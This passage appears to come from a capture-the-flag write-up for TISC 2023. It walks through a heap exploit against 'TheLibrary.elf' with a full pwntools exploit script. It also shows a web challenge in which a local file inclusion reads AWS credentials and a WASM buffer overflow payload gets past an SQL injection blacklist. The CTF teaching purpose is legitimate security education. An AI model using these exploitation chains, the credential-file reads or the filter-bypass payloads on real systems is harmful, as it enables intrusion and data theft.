Since there are so many structs, each with its own operations and function pointers, we can construct many primitives, so exploitation is not a problem. The general exploitation flow I took was as such: spray the heap with a chunk with certain data (that we control) then free those chunks; allocate a new chunk until it lands on one of the previously used chunks (determine this using some means); abuse the functionality on the controlled data.

I’ll briefly walk through the specific method I took. First we want to obtain a stack leak. brochurestand and library_info have the following structure (offset: field_name):

1
2
3
4
5
6
7
8
9
10
11
12
brochurestand {
    +0 unused
    +2 fn_table
    +4 row_data
    +6 next
    +8 prev
}
library_info {
    +0: unused
    +4: library_name
    +8: library_motto
}

The 3 stack pointers row_data, next, prev overlap with the library_name and library_motto buffers, which we can read. So, we spray the heap with brochurestand then free it up so that library_info can use one of its chunks. Then, we find the library_info chunk that has a non-null name and motto, which indicates that it contains the pointer data from a previous chunk.

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
def create_brochurestand_chunk(header):  # we will use this for later!
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"1")  # choose "add brochure stand"
    sla(b"[Brochures Stand] Please provide a header for this brochures stand (max 32 characters)", header)
    sla(b"[Brochures Stand Main] Enter your option:", b"3")  # choose "remove brochure stand"
    sla(b"[Brochure Stand Main] Please provide the index of the brochure stand you would like to remove", b"1")
    sla(b"[Brochures Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

create_brochurestand_chunk(b"wtv")

logs = []
def find_brochurestand_chunk():
    edit_name_motto(b"", b"")
    p.recvuntil(b"[Name & Motto] The following are your chosen name and motto")
    name = p.recvline_contains(b"[Name]:")[10:][:0x10]
    motto = p.recvline_contains(b"[Motto]:")[11:][:0x30]
    assert len(name) == 0x10 and len(motto) == 0x30
    logs.append((name, motto))

for _ in range(0x400):
    find_brochurestand_chunk()
    
def all_zeroes(x):
    for i in x:
        if i != 0:
            return False
    return True

leaks = None
for i, (a, b) in enumerate(logs):
    if not all_zeroes(a) or not all_zeroes(b):
        print(i)
        print(a, b)
        leaks = (a, b)
        break
        
assert leaks != None
leak1 = u64(leaks[0][:6].ljust(8, b"\0"))
leak2 = u64(leaks[0][8:8+6].ljust(8, b"\0"))
log.info(f"Leaks: {hex(leak1)}, {hex(leak2)}")
massive = leak1
large = massive - 0x00007ffff7e2a010 + 0x00007ffff7e7b010
large = leak2 // 0x25000 * 0x25000 + 0x10 # NOTE: THIS IS PROBABILISTIC
log.info(f"Massive: {hex(massive)}, Large: {hex(large)}")

The leaks are actually leaks into large_25000 and massive_50000, thus leaking their addresses. However, note that since the offset into large_25000 is randomised, we only have an approximate idea of the address of large_25000.

The next important part of the exploit is gaining arbitrary read/write. However, many possibly exploitable areas checked whether the address we are referencing is within bounds of massive_50000, preventing any OOB access. One place this wasn’t present was in swap_brochure, which simply took two indices for the brochures and swapped them. The only check was that the two indices were less than the current size of the brochurestand. To achieve this, we use the cdstand serial to overwrite the current size. Let’s examine their structures:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Cdstand {
    +0 unused
    +2 fn_table
    +4 next
    +6 prev
    +8 rows[0]  // points to a Serial
    +10 rows[1]  // points to a Serial
        ...
}

Serial {
    current_size: long,
    capacity: long,
    serials: long[5]
}

Brochurestand {
    +0 unused
    +2 fn_table
    +4 row_data  // points to a Brochurerow
    +6 next
    +8 prev
}

BrochureRow {
    buffer: long[4],
    current_size: long,
    capacity: long,
    titles: char[16][16]
}

So, we want Serial to overlap with BrochureRow in such a manner:

1
2
3
4
BrochureRow                        buffer            current_size      capacity       titles
                                   long[4]           long              long           char[16][16]
Serial      current_size           capacity          serials
            long                   long              long[5]

Then, by adding serial numbers to the Serial struct, we can control the current_size and capacity of the BrochureRow, giving us the OOB swap primitive.

In order to get Serial to overlap with BrochureRow, we can use the same spraying technique as earlier to get a Cdstand struct to land in a chunk that has rows[1] already set to the address of our BrochureRow. Since both Serial and BrochureRow are massive_50000 (allocated by the bump allocator), their addresses can be predicted ahead of time with our stack leak. We utilise the library_info chunk to write the address of the BrochureRow in library_motto, overlapping with the Cdstand struct’s row[1] value. There’s a bit of extra set-up to get the Serial struct’s current_size and capacity to be valid. Since these two fields overlap with the BrochureRow struct’s buffer, we can actually just control their values by setting the name of the BrochureRow struct accordingly.

With this in place, we can finally increase the current_size of the BrochureRow, helping us pass the check in swap_brochure and giving us our arbitrary swap primitive.

From here, we can use the swap primitive to arbitrary read (swap the address into the BrochureRow struct’s titles and read it) and to arbitrary write (write into titles, then swap that into the desired address). We use this to construct a fake function table that points to the win function present in the binary. Finally, we overwrite one of the struct’s fn_table value with our forged function table and trigger the win function.

There’s a bit more nuance to the entire exploit then I let on due to the randomness of the allocator, so there’s actually a bit more spraying involved for each of the steps.

Final exploit:

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
from pwn import *
fn = "./TheLibrary.elf"
elf = ELF(fn, checksec=False)
context.binary = elf
libc = elf.libc
p = remote("chals.tisc23.ctf.sg", 26195)
sla = lambda x, y: p.sendlineafter(x, y)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
# ======================================
# Exploit goes here
def start(name, motto):
    sla(b"[Name & Motto] Please enter the name of your library (limited to 16 characters):", name)
    sla(b"[Name & Motto] Please enter the motto of your library (limited to 48 characters):", motto)

def edit_name_motto(name, motto):
    sla(b"[Library App Main] Enter your choice:", b"1")
    start(name, motto)

start(b"", b"")
def create_brochurestand_chunk(header):  # we will use this for later!
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"1")  # choose "add brochure stand"
    sla(b"[Brochures Stand] Please provide a header for this brochures stand (max 32 characters)", header)
    sla(b"[Brochures Stand Main] Enter your option:", b"3")  # choose "remove brochure stand"
    sla(b"[Brochure Stand Main] Please provide the index of the brochure stand you would like to remove", b"1")
    sla(b"[Brochures Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

create_brochurestand_chunk(b"wtv")

logs = []
def find_brochurestand_chunk():
    edit_name_motto(b"", b"")
    p.recvuntil(b"[Name & Motto] The following are your chosen name and motto")
    name = p.recvline_contains(b"[Name]:")[10:][:0x10]
    motto = p.recvline_contains(b"[Motto]:")[11:][:0x30]
    assert len(name) == 0x10 and len(motto) == 0x30
    logs.append((name, motto))

for _ in range(0x400):
    find_brochurestand_chunk()

def all_zeroes(x):
    for i in x:
        if i != 0:
            return False
    return True

leaks = None
for i, (a, b) in enumerate(logs):
    if not all_zeroes(a) or not all_zeroes(b):
        print(i)
        print(a, b)
        leaks = (a, b)
        break

assert leaks != None
leak1 = u64(leaks[0][:6].ljust(8, b"\0"))
leak2 = u64(leaks[0][8:8+6].ljust(8, b"\0"))
log.info(f"Leaks: {hex(leak1)}, {hex(leak2)}")
massive = leak1
large = massive - 0x00007ffff7e2a010 + 0x00007ffff7e7b010
large = leak2 // 0x25000 * 0x25000 + 0x10 # NOTE: THIS IS PROBABILISTIC
log.info(f"Massive: {hex(massive)}, Large: {hex(large)}")

# Next, we want to create a cdstand that overlaps into an existing chunk
def create_libraryinfo_chunk(x):
    intended = x  # overlaps with cdstand->rows[1]
    edit_name_motto(b"B"*16, p64(0) + p64(intended))

def find_libraryinfo_chunk():
    done = False
    for i in range(0x1000):
        sla(b"[Library App Main] Enter your choice:", b"4")  # choose "cd/dvd stand layout"
        sla(b"[CD/DVD Stand Main] Enter your option:", b"1")  # choose "add cd/dvd stand"
        sla(b"[CD/DVD Stand Main] Enter your option:", b"2")  # choose "edit cd/dvd stand"
        sla(b"[CD/DVD Stand Main] Please select a CD/DVD stand of interest to edit:", b"1")
        sla(b"Enter your option:", b"5")  # choose "list cd/dvds"

        p.recvuntil(b"[CD/DVD Stand] Listing all the CD/DVDs in this stand")
        p.recvline_contains(b"[Row 1]")
        info = p.recvuntil(b"What would you like to do")
        if b"[Row 2]" in info:
            print(info)
            done = True
        
        sla(b"Enter your option:", b"7")  # choose "back to main menu"
        sla(b"[CD/DVD Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

        if done:
            log.info(f"find_libraryinfo_chunk() Done in {i} cycles")
            return info

    return None

brochure_row = massive + 16 - 0x7ffff7e2a010 + 0x007ffff7e2a140 # fn_table
for _ in range(0x1000):
    create_libraryinfo_chunk(brochure_row)

def setup_cdstand_head():
    sla(b"[Library App Main] Enter your choice:", b"4")  # choose "cd/dvd stand layout"
    sla(b"[CD/DVD Stand Main] Enter your option:", b"1")  # choose "add cd/dvd stand"
    sla(b"Enter your option:", b"7")  # choose "back to main menu"
    sla(b"[CD/DVD Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

def prep_brochurerow(header):
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"1")  # choose "add brochure stand"
    sla(b"[Brochures Stand] Please provide a header for this brochures stand (max 32 characters)", header)
    sla(b"[Brochures Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

# later on, p64(0) will serve as the Serial current_size, p64(5) as the Serial capacity
prep_brochurerow(b"A" * 16 + p64(0) + p64(5))

chunk = find_libraryinfo_chunk()
assert chunk != None
print(list(chunk))

"""
Exploit plan:
cdstand -> set row[1] (Serial) to point to a BrochureRow+16. Then, the Serial's current_size = long[2], capacity = long[3].
The overlap also means that the Serial's serials overlap the BrochureRow's current_size. This allows us to increase current_size arbitrarily.
BrochureRow                        buffer            current_size      capacity       titles
                                   long[4]           long              long           char[16][16]
Serial      current_size           capacity          serials
            long                   long              long[5]

Then, we do a swap on the BrochureRow, using the OOB to r/w into the large chunk, swapping a fn_table in.
In order to craft an arbitrary fn_table (since we can only write numeric serials into the Serial), we make use of another struct further along massive.
Note that throughout this, it is important that the addresses we swap are located _after_ the BrochureRow in massive.
"""

# Now, our Serial's serials[0] overlaps with the BrochureRow's current_size
def overwrite_brochurerow_size(val):
    sla(b"[Library App Main] Enter your choice:", b"4")  # choose "cd/dvd stand layout"
    sla(b"[CD/DVD Stand Main] Enter your option:", b"2")  # choose "edit cd/dvd stand"
    sla(b"[CD/DVD Stand Main] Please select a CD/DVD stand of interest to edit:", b"1")
    fake_serials = [b"0", b"16"]
    sla(b"Enter your option:", b"3")  # choose "add cd/dvds"
    sla(b"[CD/DVD Stand] Please select a row from this CD/DVD Stand", b"2")
    # Here, we finally overwrite the BrochureRow's current_size with val
    sla(b"[CD/DVD Stand] Please provide the serial of the CD/DVD (8 digit serial) that is to be added", val)
    # If we add another cd, we overwrite BrochureRow's capacity
    
    sla(b'Enter your option:', b"7")  # choose "back to main menu"
    sla(b'[CD/DVD Stand Main] Enter your option:', b"5")  # choose "back to library app main menu"

log.info(f"Here's the brochurerow: {hex(brochure_row)}")
overwrite_brochurerow_size(b"99999999")

def use_brochurerow_oob(idx1, idx2):
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"2")  # choose "edit brochure stand"
    sla(b"[Brochures Stand Main] Please select a brochures stand of interest to edit:", b"1")
    sla(b"Enter your option:", b"4")  # choose "swap brochures"
    sla(b"[Brochures Stand] Select the first index you would like to swap", str(idx1).encode("ascii"))
    sla(b"[Brochures Stand] Select the second index you would like to swap", str(idx2).encode("ascii"))
    sla(b"Enter your option:", b"7")  # choose "back to main menu"
    sla(b"[Brochures Stand Main] Enter your option", b"5")  # chose "back to library app main menu"

def do_swap_0x10(addr1, addr2):
    assert addr1 > brochure_row and addr2 > brochure_row
    log.info(f"Doing swap on {hex(addr1)} & {hex(addr2)}")
    begin = brochure_row + 0x30  # from the titles offset
    use_brochurerow_oob((addr1 - begin) // 0x10 + 2, (addr2 - begin) // 0x10 + 2)

"""
Create a struct (BrochurestandRow) in massive that has a data buffer
Spray large with structs that have fn_table (Bookshelf is the smallest offset-wise)
Swap the large fn_table with the massive data buffer
Read the massive data buffer to leak base
Construct a fake fn_table in massive
Swap the fake fn_table with the previous large fn_table
Spray to RCE by trying all of the structs
"""
def prep_brochurerow_for_reading(header):
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"1")  # choose "add brochure stand"
    sla(b"[Brochures Stand] Please provide a header for this brochures stand (max 32 characters)", header)
    sla(b"[Brochures Stand Main] Enter your option:", b"2")  # choose "Edit Brochure Stand"
    sla(b"[Brochures Stand Main] Please select a brochures stand of interest to edit:", b"1")
    sla(b"Enter your option:", b"2")  # choose "Add Brochure"
    sla(b"[Brochures Stand] Please provide the brochure's title that is to be added", b"")
    sla(b"Enter your option:", b"7")  # choose "Back to main menu"
    sla(b"[Brochures Stand Main] Enter your option:", b"5")  # choose "back to library app main menu"

# prep_brochurerow_for_reading(b"C"*0x10)
prep_brochurerow(b"D"*0x10)
brochurerow_for_reading = massive - 0x7ffff7e2a010 + 0x007ffff7e2a388
def spray_massive(times):
    for _ in range(times):
        sla(b"[Library App Main] Enter your choice:", b"2")  # choose "Book Shelf Layout"
        sla(b"[Book Shelf Main] Enter your option:", b"1")  # choose "Add Book Shelf"
        sla(b"[Book Shelf] Please provide a description for this row of books (max 48 characters)", b"")
        sla(b"[Book Shelf Main] Enter your option:", b"5")  # choose "Back to Library App Main Menu"

log.info("spraying...")
spray_massive(0x200)
log.info("done spraying..")
log.info(f"{hex(brochurerow_for_reading)=}")

# Hope luck is on our side :D
bookshelf_likely = large + 0x100 + 0x12000  # TODO: here, the probabilistic from earlier applies..
# input(f"check it out... {hex(bookshelf_likely)}")
do_swap_0x10(bookshelf_likely, brochurerow_for_reading)

def leak_base(offset=0, order=1):
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"2")  # choose "edit brochure stand"
    sla(b"[Brochures Stand Main] Please select a brochures stand of interest to edit:", b"2")  # recall that the first is used for the overlap earlier
    sla(b"Enter your option:", b"5")  # choose "list brochures"
    a = p.recvline_contains(b"[Header]:")
    leak = u64(a[12+offset:][:6][::order].ljust(8, b"\0"))
    sla(b"Enter your option:", b"7")  # choose "back to main menu"
    sla(b"[Brochures Stand Main] Enter your option", b"5")  # chose "back to library app main menu"

    return leak

leak = leak_base()  # note that this works probabilistically, based on how much we spray_massive
log.info(hex(leak))
assert leak != 0x0

do_swap_0x10(leak, brochurerow_for_reading)
leak2 = leak_base(2, -1)
log.info(hex(leak2))
elf.address = leak2 - 0x555555557a4c + 0x00555555554000
log.info(f"Found elf base: {hex(elf.address)}")

# context.log_level = "debug"
def construct_fake_fntable(payload):  # this also uses brochurerow_for_reading
    sla(b"[Library App Main] Enter your choice:", b"5")  # choose "brochures stand layout"
    sla(b"[Brochures Stand Main] Enter your option:", b"2")  # choose "edit brochure stand"
    sla(b"[Brochures Stand Main] Please select a brochures stand of interest to edit:", b"2")  # recall that the first is used for the overlap earlier
    sla(b"Enter your option:", b"1")  # choose "create brochure stand header"
    sla(b"[Brochures Stand] Please provide a header for this brochures stand (max 32 characters)", payload)
    sla(b"Enter your option:", b"7")  # choose "back to main menu"
    sla(b"[Brochures Stand Main] Enter your option", b"5")  # chose "back to library app main menu"

def scramble_number_hex(p1):  # this function is reversible
    i = (p1 >> 0x20)
    return (i >> 0x10 & 0xff) << 8 | (p1 & 0xff) << 0x38 | ((p1 >> 8) & 0xff) << 0x30 | ((p1 >> 0x10) & 0xff) << 0x28 | ((p1 >> 0x18) & 0xff) << 0x20 | (i & 0xff) << 0x18 | (i >> 8 & 0xff) << 0x10 | p1 >> 0x38

win_addr = elf.address + 0x8054
construct_fake_fntable(p64(brochurerow_for_reading + 0x8 - 0x18) + p64(scramble_number_hex(win_addr)))
do_swap_0x10(brochurerow_for_reading, bookshelf_likely)

def spray_to_exec(times):
    for i in range(1, times+1):
        sla(b"[Library App Main] Enter your choice:", b"2")  # choose "Book Shelf Layout"
        sla(b"[Book Shelf Main] Enter your option:", b"2")  # choose "Edit Book Shelf"
        sla(b"[Book Shelf Main] Please select a book shelf of interest to edit:", str(i).encode("ascii"))
        sla(b"Enter your option:", b"4")  # trigger maybe?
        flag = p.recvline_contains([b"[Book Shelf] Listing the rows within Book Shelf", b"TISC"])
        if b"TISC" in flag:
            print(flag)
            break
        sla(b"Enter your option:", b"6")
        sla(b"[Book Shelf Main] Enter your option:", b"5")  # choose "Back to Library App Main Menu"

# context.log_level = "debug"
spray_to_exec(0x200)
p.interactive()

Flag: TISC{fr3e-FrE3-l3t_mE_fReEe3!!}

Level 8

Blind SQL Injection (Web, RE, Pwn, Cloud)

“We found this horribly made website on their web servers,” your superior tells you. “It’s probably just a trivial SQL injection vulnerability to extract the admin password. I’m expecting this to be done in about an hour.” http://chals.tisc23.ctf.sg:28471/ Attached files: Dockerfile server.js db-init.sql

server.js is a Node Express app. The /api/login route parses our username and password through a AWS Lambda to check for blacklisted characters before using the output as a database query. From the challenge description, we want to bypass the Lambda’s checks and use a Blind SQLi to exfiltrate the flag. We can try using the usual SQLi payloads but indeed all of them are blocked by the blacklist.

Looking through the routes, we see an unauthenticated route that gives us LFI in the viewType body parameter:

1
2
3
4
5
6
app.post('/api/submit-reminder', (req, res) => {
    const username = req.body.username;
    const reminder = req.body.reminder;
    const viewType = req.body.viewType;
    res.send(pug.renderFile(viewType, { username, reminder }));
});

From the Dockerfile, we see an interesting file to grab: COPY .aws/ /root/.aws/. .aws is an AWS folder that contains the config and credentials file, which contain a profile for interacting with the AWS SDK. We retrieve these files and use them to authenticate with AWS.

Intuitively, we try a few operations relating to the Lambda function, and find that we can invoke the function (as expected) but also retrieve the function’s source code. Here’s the snippet I used to retrieve the source.

1
2
3
4
5
6
7
8
9
10
11
12
13
const { LambdaClient, GetFunctionCommand } = require("@aws-sdk/client-lambda"); // CommonJS import
const client = new LambdaClient();

input = {
  FunctionName: "craft_query", // required
};
command = new GetFunctionCommand(input);
async function f() {
  const response = await client.send(command);
  console.log(response);
  console.log(new TextDecoder().decode(response.Payload));
}
f();

Output:

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
$ node retrieve.js                                                                                                                               1 
{
  '$metadata': {
    httpStatusCode: 200,
    requestId: '0c64a8e7-f962-4035-9709-f39aceae7284',
    extendedRequestId: undefined,
    cfId: undefined,
    attempts: 1,
    totalRetryDelay: 0
  },
  Code: {
    RepositoryType: 'S3',
    Location: 'https://awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com/snap'[...]        
  },
  Configuration: {
    Description: '',
    TracingConfig: { Mode: 'PassThrough' },
    SnapStart: { OptimizationStatus: 'Off', ApplyOn: 'None' },
    RevisionId: '1c0f493a-fe17-4937-9b1e-20ae789bccc5',
    LastModified: '2023-09-27T13:14:24.000+0000',
    FunctionName: 'craft_query',
    Runtime: 'nodejs18.x',
    Version: '$LATEST',
    PackageType: 'Zip',
    LastUpdateStatus: 'Successful',
    FunctionArn: 'arn:aws:lambda:ap-southeast-1:051751498533:function:craft_query',
    MemorySize: 128,
    Timeout: 3,
    Handler: 'index.handler',
    CodeSha256: 'dPnFkqAp8WAf3YZSQa4LUNIhsj8frklyIvI1SRb7PFw=',
    Role: 'arn:aws:iam::051751498533:role/tisc23_ctf_sg-prod20230727104447843500000001',
    RuntimeVersionConfig: {
      RuntimeVersionArn: 'arn:aws:lambda:ap-southeast-1::runtime:0bdff101a7b4e0589af824f244deb93200e4663c2a8d7d0148b76cd00c48777a'
    },
    CodeSize: 26993,
    State: 'Active',
    EphemeralStorage: { Size: 512 },
    Architectures: [ 'x86_64' ]
  },
  Tags: {
    Project: 'tisc23.ctf.sg',
    Owner: 'kennethtan',
    ProvisionedBy: 'terraform',
    Region: 'ap-southeast-1',
    Env: 'prod'
  }
}

(I shortened the location property in the output above because the URL is quite long) Accessing the location URL, we can download the Lambda function’s source code. The source comprises 3 files: index.js, site.js, site.wasm. index.js is a wrapper for the craft_query function, and site.js contains boilerplate for interfacing with the site.wasm wasm code. Seems like we need to analyze the wasm file to understand how the function works and how to bypass the blacklist.

We can use a trick to turn the WASM into something more readable. We first decompile the wasm into C code using wasm2c. Then, we compile the resultant C code into a binary. Finally, we view the binary’s decompilation in Ghidra. After some reversing, we get to the meat of the function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
undefined4 w2c_craft_query(long this,undefined4 username,undefined4 password) {
  undefined4 buf;
  uint uVar1;
  bool res;
  int stack_buffer?;
  
  stack_buffer? = *(int *)(this + 8);
  uVar1 = stack_buffer? - 0xa0;
  *(uint *)(this + 8) = uVar1;
  i32_store(this + 0x18,(ulong)uVar1 + 0x9c,username);
  i32_store(this + 0x18,(ulong)uVar1 + 0x98,password);
  i32_store(this + 0x18,(ulong)uVar1 + 0x94,1);
  i32_store(this + 0x18,(ulong)uVar1 + 0xc,1);
  i32_store(this + 0x18,(ulong)uVar1 + 8,2);
  buf = i32_load(this + 0x18,(ulong)uVar1 + 0x9c);
  get_decoded_username?(this,stack_buffer? + -0x50,buf);
  buf = i32_load(this + 0x18,(ulong)uVar1 + 0x98);
  get_password?(this,stack_buffer? + -0x90,buf,0x3b);
  i32_store8(this + 0x18,(ulong)uVar1 + 0x4b,0);
  uVar1 = i32_load(this + 0x18,(ulong)uVar1 + 0x94);
  if ((uVar1 < *(uint *)(this + 0x3c)) &&
     (*(long *)((ulong)uVar1 * 0x18 + *(long *)(this + 0x30) + 8) != 0)) {
    res = true;
  }
  else {
    res = false;
  }
  if ((!res) || (*(int *)((ulong)uVar1 * 0x18 + *(long *)(this + 0x30)) != func_types._12_4_)) {
    wasm_rt_trap(6);
  }
                    /* suspected to call w2c_is_blacklisted */
  buf = (**(code **)((ulong)uVar1 * 0x18 + *(long *)(this + 0x30) + 8))
                  (*(undefined8 *)((ulong)uVar1 * 0x18 + *(long *)(this + 0x30) + 0x10),
                   stack_buffer? + -0x50,stack_buffer? + -0x90);
  *(int *)(this + 8) = stack_buffer?;
  return buf;
}

Here, the get_decoded_username? function is especially interesting. The comment in server.js also points us to some possible shenanigans in decoding the username.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void get_decoded_username?(long param_1,undefined4 out_buf,undefined4 param_3) {
  int iVar1;
  uint uVar2;
  char char;
  undefined4 i;
  uint j;
  int iVar3;
  int iVar4;
  undefined4 uVar5;
  
  iVar1 = *(int *)(param_1 + 8);
  uVar2 = iVar1 - 0x20;
  *(uint *)(param_1 + 8) = uVar2;
  i32_store(param_1 + 0x18,(ulong)uVar2 + 0x1c,out_buf);
  i32_store(param_1 + 0x18,(ulong)uVar2 + 0x18,param_3);
  while( true ) {
    i = i32_load(param_1 + 0x18,(ulong)uVar2 + 0x18);
    char = i32_load8_u(param_1 + 0x18,i);
    if (char == '\0') break;
    i = i32_load(param_1 + 0x18,(ulong)uVar2 + 0x18);
    char = i32_load8_u(param_1 + 0x18,i);
    if (char == '%') {
      j = i32_load(param_1 + 0x18,(ulong)uVar2 + 0x18);
      char = i32_load8_u(param_1 + 0x18,(ulong)j + 1);
      i = check_hexadecimal(param_1,(int)char);
[...]

The interesting part of this function is in its while( true ) loop, which iterates of the characters of the input, stopping only when it reads a null-byte. This sounds like a possible buffer overflow.

At this stage, I decided to play around with the lambda function (since we can directly invoke it) and observe its output. If there really were a BOF in the username, it should be quite easy to trigger undefined behaviour. Here’s a normal use of the function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ node pwn.js 
{"username":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","password":""}
{
  '$metadata': {
    httpStatusCode: 200,
    requestId: '78c45aeb-e791-451b-835b-88d85c0fb286',
    extendedRequestId: undefined,
    cfId: undefined,
    attempts: 1,
    totalRetryDelay: 0
  },
  ExecutedVersion: '$LATEST',
  Payload: Uint8ArrayBlobAdapter(91) [Uint8Array] [
     34,  83, 69,  76,  69,  67,  84,  32,  42,  32, 102, 114,
    111, 109, 32,  85, 115, 101, 114, 115,  32,  87,  72,  69,
     82,  69, 32, 117, 115, 101, 114, 110,  97, 109, 101,  61,
     92,  34, 65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65,  65,  65,  92,  34,
     32,  65, 78,  68,  32, 112,  97, 115, 115, 119, 111, 114,
    100,  61, 92,  34,  92,  34,  34
  ],
  StatusCode: 200
}
"SELECT * from Users WHERE username=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" AND password=\"\""

And this is what happens when we send a longer input.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ node pwn.js
{"username":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","password":""}
{
  '$metadata': {
    httpStatusCode: 200,
    requestId: '569a3b9c-3243-4b07-bc03-8fc409e2d341',
    extendedRequestId: undefined,
    cfId: undefined,
    attempts: 1,
    totalRetryDelay: 0
  },
  FunctionError: 'Unhandled',
  ExecutedVersion: '$LATEST',
  Payload: Uint8ArrayBlobAdapter(426) [Uint8Array] [
    123,  34, 101, 114, 114, 111, 114,  84, 121, 112, 101,  34,
     58,  34,  82, 117, 110, 116, 105, 109, 101,  69, 114, 114,
    111, 114,  34,  44,  34, 101, 114, 114, 111, 114,  77, 101,
    115, 115,  97, 103, 101,  34,  58,  34, 116,  97,  98, 108,
    101,  32, 105, 110, 100, 101, 120,  32, 105, 115,  32, 111,
    117, 116,  32, 111, 102,  32,  98, 111, 117, 110, 100, 115,
     34,  44,  34, 116, 114,  97,  99, 101,  34,  58,  91,  34,
     82, 117, 110, 116, 105, 109, 101,  69, 114, 114, 111, 114,
     58,  32, 116,  97,
    ... 326 more items
  ],
  StatusCode: 200
}
{"errorType":"RuntimeError","errorMessage":"table index is out of bounds","trace":["RuntimeError: table index is out of bounds","    at wasm://wasm/456522fa:wasm-function[9]:0xe1d","    at /var/task/site.js:666:22","    at ccall (/var/task/site.js:1230:22)","    at /var/task/site.js:1247:16","    at exports.handler (/var/task/index.js:25:20)","    at Runtime.handleOnceNonStreaming (file:///var/runtime/index.mjs:1147:29)"]}

From here, I guessed that the last few bytes were used as some sort of function table offset. As long as the offset was valid (i.e. not too large), the function would continue running normally. Through a bit of trial and error, I found a suitable value. At the time, I didn’t do too much debugging as to why, but this UB actually bypasses the blacklist check, so we can now include any character we want.

1
2
3
4
5
6
let exp = "abc\"%22";
exp = exp.concat("A".repeat(0x45 - exp.length))
const payload = JSON.stringify({
  username:   exp.concat("\x42\x02\x00\x00\x00\x00\x00\x00"),
  password: "",
});

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ node pwn.js
{"username":"abc\"%22AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB\u0002\u0000\u0000\u0000\u0000\u0000\u0000","password":""}
{
  '$metadata': {
    httpStatusCode: 200,
    requestId: '2ce915ca-20aa-48ce-b17a-bf14320ac0e0',
    extendedRequestId: undefined,
    cfId: undefined,
    attempts: 1,
    totalRetryDelay: 0
  },
  ExecutedVersion: '$LATEST',
  Payload: Uint8ArrayBlobAdapter(135) [Uint8Array] [
     34,  83, 69,  76,  69,  67,  84,  32, 42,  32, 102, 114,
    111, 109, 32,  85, 115, 101, 114, 115, 32,  87,  72,  69,
     82,  69, 32, 117, 115, 101, 114, 110, 97, 109, 101,  61,
     92,  34, 97,  98,  99,  92,  34,  92, 34,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65, 65,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65, 65,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65, 65,  65,  65,  65,
     65,  65, 65,  65,  65,  65,  65,  65, 65,  65,  65,  65,
     65,  65, 65,  65,
    ... 35 more items
  ],
  StatusCode: 200
}
"SELECT * from Users WHERE username=\"abc\"\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB\u0002\" AND password=\"\""

All that is left is to write out a Blind SQLi script, with the bypass, to exfiltrate the flag from the DB.

Hide/show code
1
2
3
4
5
6
